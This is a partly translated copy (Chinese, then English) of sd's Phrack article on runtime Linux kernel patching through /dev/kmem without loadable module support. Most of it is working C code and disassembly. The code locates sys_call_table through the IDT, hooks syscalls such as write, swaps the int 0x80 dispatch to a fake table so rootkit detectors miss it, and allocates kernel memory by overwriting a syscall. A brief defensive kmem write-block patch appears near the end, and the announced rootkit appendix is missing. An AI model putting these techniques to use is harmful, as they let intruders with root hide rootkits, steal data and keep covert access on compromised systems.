Linux on-the-fly kernel patching without LKM
Written by : sd
First published on : Phrack
Translated by : drinkey
目录
1 - 简介
2 - 我们的朋友--/dev/kmem
3 - 替换内核系统调用,sys_call_table[]
3.1 - 怎样不用LKM得到 sys_call_table[]
3.2 - 重定向中断调用 0x80 到 sys_call_table[eax]
4 - 不用 LKM 的支持来分配内核空间
4.1 - 使用 LKM支持搜索 kmalloc()
4.2 - kmalloc() 的模式搜索
4.3 - GFP_KERNEL 的值
4.4 - 重写系统调用
5 - 注意事项
6 - 可能的解决方法
7 - 结论
8 - 参考
9 - 附录:SucKIT: 成就
1、简介
首先,我们应该感谢很久以前开发了kernel patching技术的Silvio Cesare,我的大多数想法都是从他那里窃取的:)
在这篇文章里,我们将要讨论,如何能不用模块或者System.map的支持而随意的使用Linux内核(主要是系统调用)。所以我们假设读者都了解LKM是什么,LKM如何加载到内核里等等的知识。如果你不是很确定,那么请看其他的一些文档。
想象一个情节,一个可怜的人需要改变一些有趣的Linux系统调用,而且LKM的支持并没有被编译进内核。他有一个工具箱,他得到了root权限,但是管 理员很变态,他禁用了那个人修改的sshd,人们最爱的LKM rootkit由于没有必要的gcc编译器、库、头文件,无法编译。
这里有一些解决方案,一步一步的讲解,文章的最后还有一个全功能的linux-ia32 rootkit,一个例子或者工具,它包含了所有这里讨论的技术。
这里描述的大多数东西,例如系统调用,内存地址,代码,只在ia32架构的计算机上通过测试。
2、我们的朋友 /dev/kmem
简单来说,这篇文章中,我们所做的一切有关内核空间的,都是使用标准的Linux设备,/dev/kmem。由于这个设备很有可能是只有root有+rw 权限,如果你想随意的实用它,必须reboot。注意,改变/dev/kmem的权限来获得访问是不够的。在VFS允许访问/dev/kmem之后,还会 检查/device/char/mem.c是否有处理的能力(CAP_SYS_RAWIO)。
我们同样应该注意另外一个设备,/dev/mem。这个设备表示在进行虚拟内存转换之前的物理内存影象。如果我们知道了页目录的位置,通过这个设备也可能达到修改系统内核的目的。在本文中,我们不讨论这种可能性。
在代码中选址,读,写分别用lseek(),read(),write()来实现,非常简单
C++代码
-
- static inline int rkm(int fd, int offset, void *buf, int size)
- {
- if(lseek(fd, offset, 0) != offset) return 0;
- if(read(fd, buf, size) != size) return 0;
- return size;
- }
-
-
- static inline int wkm(int fd, int offset, void *buf, int size)
- {
- if (lseek(fd, offset, 0) != offset) return 0;
- if (write(fd, buf, size) != size) return 0;
- return size;
- }
-
-
- static inline int rkml(int fd, int offset, ulong *buf)
- {
- return rkm(fd, offset, buf, sizeof(ulong));
- }
-
-
- static inline int wkml(int fd, int offset, ulong buf)
- {
- return wkm(fd, offset, &buf, sizeof(ulong));
- }
3、替换系统调用 sys_call_table[]
我们都知道,从用户空间的角度看,系统调用在Linux中,是最底层的系统函数,因此它们是我们最感兴趣的东西。系统调用被分组集合在一起存放在 sys_call_table[](sct),它是一个一维数组,保存了256个指针(在ia32架构中),使用系统调用号作为索引,定位系统调用的入口 点。就这样而已。看下面的用伪代码描述的例子
C++代码
-
-
-
- int (*old_write) (int, char *, int);
-
- new_write(int fd, char *buf, int count) {
- if (fd == 1) {
- old_write(fd, "Hello world!\n", 13);
- return count;
- } else {
- return old_write(fd, buf, count);
- }
- }
-
- old_write = (void *) sys_call_table[__NR_write];
- sys_call_table[__NR_write] = (ulong) new_write;
-
-
这样的代码是大多数 LKM rootkit,tty嗅探劫持程序中经常遇到的,它保证我们可以正确的导入 sys_call_table[] 和操作它。换而言之,它是由/sbin/insmod[调用create_module()或init_module()]导入内核的。
好了我们到此为止,我想大家都对它很清楚了
3.1 - 怎样不用LKM得到 sys_call_table[]
首先,注意到一点,如果不把LKM编译进内核,Linux内核不会保留任何符号信息。这是一个很明智的决定,如果有人不需要实用这些信息,那么LKM的支 持还有什么用呢?为了调试?已经有System.map可以代替了。当然,我们需要这些符号信息:)。如果内核支持LKM,LKM需要的符号就会被导入它 们的特定连接片段。但是,我们说过,不支持LKM,这怎么办?
据我所知,得到 sys_call_table[] 最准确的方法是用下面代码实现:
C++代码
- #include <stdio.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #inlcude <fcntl.h>
-
- struct {
- unsigned short limit;
- unsigned int base;
- } __attribute__((packed)) idtr;
-
- struct {
- unsigned short off1;
- unsigned short sel;
- unsigned char none,flags;
- unsigned short off2;
- } __attribute__((packed)) idt;
-
- int kmem;
- void readkmem (void *m, unsigned off, int sz)
- {
- if(lseek(kmem,off,SEEK_SET) != off) {
- perror("kmem lseek");
- exit(2);
- }
- if(read(kmem, m, sz) != sz) {
- perror("kmem read");
- exit(2);
- }
-
- #define CALLOFF 100 /*我们简要读取int $0x80的前100字节*/
- main()
- {
- unsigned sys_call_off;
- unsigned sct;
- char sc_asm[CALLOFF],*p;
-
-
- asm ("sidt "%0" : "=m" (idtr));
- printf("idtr base at 0x%X\n",(int)idtr.base);
-
- /*打开kmem */
- kmem = open ("/dev/kmem",O_RDONLY);
- if (kmem < 0) return 1;
-
- /*从IDT读入0x80向量*/
- readkmem (&idtr,idtr.base+8*0x80,sizeof(idt));
- sys_call_off = (idt.off2 << 16) | idt.off1;
- printf("idt80: flags = %X sel = %X off = %X\n",
- (unsigned)idt.flags,(unsigned)idt.sel,sys_call_off);
-
- //寻找syscall地址
- readkmem (sc_asm,sys_call_off,CALLOFF);
- p = (char *)memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);
- sct = *(unsigned*)(p+3);
- if (p){
- printf("sys_call_table at 0x%x, call dispatch at 0x%x\n",
- sct, p);
- }
- close(kmem);
- }
这段代码具体是怎么工作呢?sidt指令向处理器询问中断描述符表sidt[asm("sidt %0" : "=m" (idtr));],从这个结构我们可以得到一个指针,从而获得int $0x80中断描述符的位置[readkmem(&idt,idtr.base+8*0x80,sizeof(idt));]。
从IDT中我们可以计算出int $0x80的入口点地址为[sys_call_off = (idt.off2 << 16) | idt.off1;]。好了,我们知道 int $0x80 从哪里开始,但是那并不是我们最终想要的sys_call_table[]。我们先看看int $0x80 的入口点(译者注:我们可以通过反汇编系统内核vmlinux文件来查看内核符号地址):
C++代码
- [sd@pikatchu linux]$ gdb -q /usr/src/linux/vmlinux
- (no debugging symbols found)...(gdb) disass system_call
- Dump of assembler code for function system_call:
- 0xc0106bc8 <system_call>: push %eax
- 0xc0106bc9 <system_call+1>: cld
- 0xc0106bca <system_call+2>: push %es
- 0xc0106bcb <system_call+3>: push %ds
- 0xc0106bcc <system_call+4>: push %eax
- 0xc0106bcd <system_call+5>: push %ebp
- 0xc0106bce <system_call+6>: push %edi
- 0xc0106bcf <system_call+7>: push %esi
- 0xc0106bd0 <system_call+8>: push %edx
- 0xc0106bd1 <system_call+9>: push %ecx
- 0xc0106bd2 <system_call+10>: push %ebx
- 0xc0106bd3 <system_call+11>: mov $0x18,%edx
- 0xc0106bd8 <system_call+16>: mov %edx,%ds
- 0xc0106bda <system_call+18>: mov %edx,%es
- 0xc0106bdc <system_call+20>: mov $0xffffe000,%ebx
- 0xc0106be1 <system_call+25>: and %esp,%ebx
- 0xc0106be3 <system_call+27>: cmp $0x100,%eax
- 0xc0106be8 <system_call+32>: jae 0xc0106c75 <badsys>
- 0xc0106bee <system_call+38>: testb $0x2,0x18(%ebx)
- 0xc0106bf2 <system_call+42>: jne 0xc0106c48 <tracesys>
- 0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4) <-- 就是它
- 0xc0106bfb <system_call+51>: mov %eax,0x18(%esp,1)
- 0xc0106bff <system_call+55>: nop
- End of assembler dump.
- (gdb) print &sys_call_table
- $1 = (<data variable, no debug info> *) 0xc01e0f18 <-- 看到了?一样的
- (gdb) x/xw (system_call+44)
- 0xc0106bf4 <system_call+44>: 0x188514ff <-- 机器指令(little endian)
- (gdb)
简单来说,就是只要找到邻近int $0x80入口点sys_call的call sys_call_table(,eax,4)指令的机器码就可以了,因为这个间接调用在内核版本在2.0.10到2.4.10的情况下是不会改变的。这 种搜索对'call <something>(,eax,4)'这种模式相对比较安全。
opcode = 0xff 0x14 0x85 0x<address_of_table>
[memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);]
其实还有更强壮的处理方式。这里我们只是简单的重定向整个IDT中的int $0x80句柄到我们的假句柄,并拦截某些有趣的调用。但是如果我们考虑重载就会变得有些复杂了。
到这里,我们知道了sys_call_table[]在哪里了,现在我们可以改变一些系统调用的地址了。下面是实现的伪代码:
C++代码
- readkmem(&old_write, sct + __NR_write * 4, 4);
- writekmem(new_write, sct + __NR_write * 4, 4);
3.2 - 重定向中断调用 0x80 到 sys_call_table[eax]
When writing this article, we found some "rootkit detectors" on Packetstorm/Freshmeat. They are able to detect the fact that something is wrong with a LKM/syscalltable/other kernel stuff...fortunately, most of them are too stupid and can be simply fooled by the the trick introduced in [6] by SpaceWalker:
Pseudocode:
ulong sct = addr of sys_call_table[]
char *p = ptr to int 0x80's call sct(,eax,4) - dispatch
ulong nsct[256] = new syscall table with modified entries
readkmem(nsct, sct, 1024); /* read old */
old_write = nsct[__NR_write];
nsct[__NR_write] = new_write;
/* replace dispatch to our new sct */
writekmem((ulong) p+3, nsct, 4);
/* Note that this code never can work, because you can't
redirect something kernel related to userspace, such as
sct[] in this case */
Background:
We create a copy of the original sys_call_table[] [readkmem(nsct, sct, 1024);], then we will modify entries which we're interested in [old_write = nsct[__NR_write]; nsct[__NR_write] = new_write;] and then change _only_ addr of <something> in the call <something>(,eax,4):
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4)
~~~~|~~~~~
|__ Here will be address of
_our_ sct[]
LKM detectors (which does not check consistency of int $0x80) won't see anything, sys_call_table[] is the same, but int $0x80 uses our implanted table.
Allocating kernel space without help of LKM support
Next thing that we need is a memory page above the 0xc0000000 (or 0x80000000) address.
The 0xc0000000 value is demarcation point between user and kernel memory. User processes have not access above the limit. Take into account that this value is not exact, and may be different, so it is good idea to figure out the limit on the fly (from int $0x80's entrypoint). Well, how to get our page above the limit ? Let's take a look how regular kernel LKM support does it (/usr/src/linux/kernel/module.c):
...
void inter_module_register(const char *im_name, struct module *owner,
const void *userdata)
{
struct list_head *tmp;
struct inter_module_entry *ime, *ime_new;
if (!(ime_new = kmalloc(sizeof(*ime), GFP_KERNEL))) {
/* Overloaded kernel, not fatal */
...
As we expected, they used kmalloc(size, GFP_KERNEL) ! But we can't use kmalloc() yet because:
* We don't know the address of kmalloc() [ paragraph 4.1, 4.2 ]
* We don't know the value of GFP_KERNEL [ paragraph 4.3 ]
* We can't call kmalloc() from user-space [ paragraph 4.4 ]
Searching for kmalloc() using LKM support
If we can use LKM support:
/* kmalloc() lookup */
/* simplest & safest way, but only if LKM support is there */
ulong get_sym(char *n) {
struct kernel_sym tab[MAX_SYMS];
int numsyms;
int i;
numsyms = get_kernel_syms(NULL);
if (numsyms > MAX_SYMS || numsyms < 0) return 0;
get_kernel_syms(tab);
for (i = 0; i < numsyms; i++) {
if (!strncmp(n, tab[i].name, strlen(n)))
return tab[i].value;
}
return 0;
}
ulong get_kma(ulong pgoff)
{
ret = get_sym("kmalloc");
if (ret) return ret;
return 0;
}
We leave this without comments.
Pattern search of kmalloc()
But if LKM is not there, were getting into troubles. The solution is quite dirty, and not-so-good by the way, but it seem to work. We'll walk through kernel's .text section and look for patterns such as:
push GFP_KERNEL <something between 0-0xffff>
push size <something between 0-0x1ffff>
call kmalloc
All info will be gathered into a table, sorted and the function called most times will be our kmalloc(), here is code:
/* kmalloc() lookup */
#define RNUM 1024
ulong get_kma(ulong pgoff)
{
struct { uint a,f,cnt; } rtab[RNUM], *t;
uint i, a, j, push1, push2;
uint found = 0, total = 0;
uchar buf[0x10010], *p;
int kmem;
ulong ret;
/* uhh, before we try to brute something, attempt to do things
in the *right* way ;)) */
ret = get_sym("kmalloc");
if (ret) return ret;
/* humm, no way ;)) */
kmem = open(KMEM_FILE, O_RDONLY, 0);
if (kmem < 0) return 0;
for (i = (pgoff + 0x100000); i < (pgoff + 0x1000000);
i += 0x10000) {
if (!loc_rkm(kmem, buf, i, sizeof(buf))) return 0;
/* loop over memory block looking for push and calls */
for (p = buf; p < buf + 0x10000;) {
switch (*p++) {
case 0x68:
push1 = push2;
push2 = *(unsigned*)p;
p += 4;
continue;
case 0x6a:
push1 = push2;
push2 = *p++;
continue;
case 0xe8:
if (push1 && push2 &&
push1 <= 0xffff &&
push2 <= 0x1ffff) break;
default:
push1 = push2 = 0;
continue;
}
/* we have push1/push2/call seq; get address */
a = *(unsigned *) p + i + (p - buf) + 4;
p += 4;
total++;
/* find in table */
for (j = 0, t = rtab; j < found; j++, t++)
if (t->a == a && t->f == push1) break;
if (j < found)
t->cnt++;
else
if (found >= RNUM) {
return 0;
}
else {
found++;
t->a = a;
t->f = push1;
t->cnt = 1;
}
push1 = push2 = 0;
} /* for (p = buf; ... */
} /* for (i = (pgoff + 0x100000) ...*/
close(kmem);
t = NULL;
for (j = 0;j < found; j++) /* find a winner */
if (!t || rtab[j].cnt > t->cnt) t = rtab+j;
if (t) return t->a;
return 0;
}
The code above is a simple state machine and it doesn't bother itself with potentionaly different asm code layout (when you use some exotic GCC options). It could be extended to understand different code patterns (see switch statement) and can be made more accurate by checking GFP value in PUSHes against known patterns (see paragraph bellow).
The accuracy of this code is about 80% (i.e. 80% points to kmalloc, 20% to some junk) and seem to work on 2.2.1 => 2.4.13 ok.
The GFP_KERNEL value
Next problem we get while using kmalloc() is the fact that value of GFP_KERNEL varies between kernel series, but we can get rid of it by help of uname()
+-----------------------------------+
| kernel version | GFP_KERNEL value |
+----------------+------------------+
| 1.0.x .. 2.4.5 | 0x3 |
+----------------+------------------+
| 2.4.6 .. 2.4.x | 0x1f0 |
+----------------+------------------+
Note that there is some troubles with 2.4.7-2.4.9 kernels, which sometimes crashes due to bad GFP_KERNEL, simply because the table above is not exact, it only shows values we CAN use.
The code:
#define NEW_GFP 0x1f0
#define OLD_GFP 0x3
/* uname struc */
struct un {
char sysname[65];
char nodename[65];
char release[65];
char version[65];
char machine[65];
char domainname[65];
};
int get_gfp()
{
struct un s;
uname(&s);
if ((s.release[0] == '2') && (s.release[2] == '4') &&
(s.release[4] >= '6' ||
(s.release[5] >= '0' && s.release[5] <= '9'))) {
return NEW_GFP;
}
return OLD_GFP;
}
Overwriting a syscall
As we mentioned above, we can't call kmalloc() from user-space directly, solution is Silvio's trick [2] of replacing syscall:
* Get address of some syscall (IDT -> int 0x80 -> sys_call_table)
* Create a small routine which will call kmalloc() and return pointer to allocated page
* Save sizeof(our_routine) bytes of some syscall
* Overwrite code of some syscall by our routine
* Call this syscall from userspace thru int $0x80, so our routine will operate in kernel context and can call kmalloc() for us passing out the address of allocated memory as return value.
* Restore code of some syscall with saved bytes (in step 3.)
our_routine may look as something like that:
struct kma_struc {
ulong (*kmalloc) (uint, int);
int size;
int flags;
ulong mem;
} __attribute__ ((packed));
int our_routine(struct kma_struc *k)
{
k->mem = k->kmalloc(k->size, k->flags);
return 0;
}
In this case we directly pass needed info to our routine.
Now we have kernel memory, so we can copy our handling routines there, point entries in fake sys_call_table to them, infiltrate this fake table into int $0x80 and enjoy the ride :)
What you should take care of
It would be good idea to follow these rules when writing something using this technique:
* Take care of kernel versions (We mean GFP_KERNEL).
* Play _only_ with syscalls, _do not_ use any internal kernel structures including task_struct, if you want to stay portable between kernel series.
* SMP may cause some troubles, remember to take care about reentrantcy and where it is needed, use user-space locks [ src/core.c#ualloc() ]
Possible solutions
Okay, now from the good man's point of view. You probably would like to defeat attacks of kids using such annoying toys. Then you should apply following kmem read-only patch and disable LKM support in your kernel.
<++> kmem-ro.diff
--- /usr/src/linux/drivers/char/mem.c Mon Apr 9 13:19:05 2001
+++ /usr/src/linux/drivers/char/mem.c Sun Nov 4 15:50:27 2001
@@ -49,6 +51,8 @@
const char * buf, size_t count, loff_t *ppos)
{
ssize_t written;
+ /* disable kmem write */
+ return -EPERM;
written = 0;
#if defined(__sparc__) || defined(__mc68000__)
<-->
Note that this patch can be source of troubles in conjuction with some old utilities which depends on /dev/kmem writing ability. That's payment for security.
Conclusion
The raw memory I/O devices in linux seems to be pretty powerful. Attackers (of course, with root privileges) can use them to hide their actions, steal informations, grant remote access and so on for a long time without being noticed. As far we know, there is not so big use of these devices (in the meaning of write access), so it may be good idea to disable their writing ability.
References
[1] Silvio Cesare's homepage, pretty good info about low-level linux stuff
[[url]http://www.big.net.au/~silvio[/url]]
[2] Silvio's article describing run-time kernel patching (System.map)
[[url]http://www.big.net.au/~silvio/runtime-kernel-kmem-patching.txt[/url]]
[3] QuantumG's homepage, mostly virus related stuff
[[url]http://biodome.org/~qg[/url]]
[4] "Abuse of the Linux Kernel for Fun and Profit" by halflife
[Phrack issue 50, article 05]
[5] "(nearly) Complete Linux Loadable Kernel Modules. The definitive guide
for hackers, virus coders and system administrators."
[[url]http://www.thehackerschoice.com/papers[/url]]
At the end, I (sd) would like to thank to devik for helping me a lot with this crap, to Reaction for common spelling checks and to anonymous editor's friend which proved the quality of article a lot.